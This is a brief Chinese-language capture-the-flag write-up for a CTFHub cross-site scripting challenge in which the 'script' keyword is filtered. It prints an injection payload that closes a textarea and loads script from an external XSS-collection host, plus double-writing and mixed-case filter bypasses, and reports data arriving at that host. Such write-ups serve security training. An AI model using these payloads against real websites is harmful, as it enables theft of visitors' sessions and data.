CTFHub XSS 过滤关键词 WriteUp

前文链接:DOM反射xss

这次直接浏览器输入payload,发现 script 被过滤掉了

</textarea>'"><script src=http://xsscom.com//cZ2vvZ></script>

在这里插入图片描述

碰到这种情况不要慌,下面给出两种方法绕过过滤关键字。

双写绕过

</textarea>'"><scrscriptipt src=http://xsscom.com//cZ2vvZ></scrscriptipt>

大小写绕过

</textarea>'"><Script src=http://xsscom.com//cZ2vvZ></scRipt>

上述两种方式提交后成功在xss平台收到数据:

在这里插入图片描述

提交flag,成功解出

在这里插入图片描述

posted @ 2023-07-05 00:42  CVE-柠檬i  阅读(107)  评论(0)    收藏  举报  来源